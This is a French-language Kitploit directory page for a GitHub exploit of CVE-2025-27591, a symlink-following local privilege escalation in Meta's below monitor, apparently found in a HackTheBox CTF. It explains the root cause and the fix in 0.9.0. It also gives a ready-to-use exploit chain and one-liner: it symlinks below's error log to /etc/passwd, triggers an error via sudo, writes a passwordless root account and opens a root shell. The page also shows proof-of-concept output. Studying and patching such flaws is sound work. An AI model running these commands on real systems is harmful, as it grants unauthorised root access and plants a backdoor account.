Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-27591-Meta-below-LPE — CVE-2025-27591 – Meta below symlink following élévation de privilèges locale (HackTheBox CTF) | Kitploit
Outils/GitHubGitHub/rippsec/cve-2025-27591-meta-below-lpe
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationMouvement LatéralCTFExploitation de Binaires
GitHubrippsec/cve-2025-27591-meta-below-lpe

CVE-2025-27591-Meta-below-LPE

CVE-2025-27591 – Meta below symlink following élévation de privilèges locale (HackTheBox CTF)

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
9il y a 4 moisPas encore vérifié

CVE-2025-27591 — Escalade de privilèges locale par lien symbolique dans Meta below

Aperçu

ChampDétails
CVECVE-2025-27591
LogicielMeta below (moniteur de ressources système)
Versions affectées< 0.9.0
VulnérabilitéSuivi de lien symbolique → écrasement arbitraire de fichier en tant que root
AuthentificationUtilisateur local avec accès sudo à below
ImpactEscalade de privilèges locale vers root
ContexteDécouvert lors du CTF HackTheBox

Description

L'outil de surveillance des ressources système below (de Meta Platforms, Inc.) contient une faille dans son mécanisme de journalisation des erreurs. Lorsqu'il est invoqué via sudo, il impose les permissions 0666 sur ses fichiers journaux situés dans /var/log/below/ sans vérifier au préalable si le chemin cible est un lien symbolique. Cela permet à un attaquant local de remplacer le fichier journal par un lien symbolique pointant vers n'importe quel fichier accessible en écriture par root, écrasant ainsi efficacement ce dernier avec un contenu contrôlé.

Détails techniques

Cause racine

Le code de journalisation dans below < 0.9.0 effectue ces opérations en séquence lorsqu'il est exécuté en tant que root :

  1. Détermine le chemin du journal : /var/log/below/error_root.log
  2. Crée ou ouvre le fichier
  3. Appelle chmod(path, 0o666) — sans vérifier s'il s'agit d'un lien symbolique
  4. Écrit le message d'erreur dans le chemin

À l'étape 4, si le chemin a été remplacé par un lien symbolique avant l'exécution, l'écriture va vers la cible du lien symbolique.

Chaîne d'exploitation

root@kitploit:~
Local user
    │
    ▼
Remove /var/log/below/error_root.log
    │
    ▼
Create symlink: /var/log/below/error_root.log → /etc/passwd
    │
    ▼
Trigger error via: sudo /usr/bin/below replay --time "invalid"
    │  (below opens the "log file", chmod 0666 hits /etc/passwd, writes error)
    ▼
/etc/passwd is now world-writable
    │
    ▼
Append rogue root entry: rooted::0:0:root:/root:/bin/bash
    │
    ▼
su rooted → root shell

Pourquoi --time "invalid" fonctionne

Le fait de passer une chaîne de temps invalide force below à journaliser un message d'erreur. Le chemin d'erreur atteint le code de journalisation qui écrit aveuglément dans le fichier, qui est maintenant notre lien symbolique.

Utilisation

root@kitploit:~
chmod +x exploit.sh
./exploit.sh

Prérequis : L'utilisateur actuel doit avoir les droits sudo pour exécuter /usr/bin/below.

Commande en une ligne

root@kitploit:~
rm -f /var/log/below/error_root.log; \
ln -s /etc/passwd /var/log/below/error_root.log; \
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1; \
echo 'rooted::0:0:root:/root:/bin/bash' > /var/log/below/error_root.log; \
su rooted

Preuve de concept

root@kitploit:~
$ whoami
lowpriv
$ ./exploit.sh
# whoami
root

Correctif

La vulnérabilité a été corrigée dans la version 0.9.0 de below. Le correctif introduit une vérification de lien symbolique avant toute opération sur les fichiers dans le chemin de journalisation.

Références

  • Entrée NVD
  • Meta below sur GitHub
Télécharger l’outil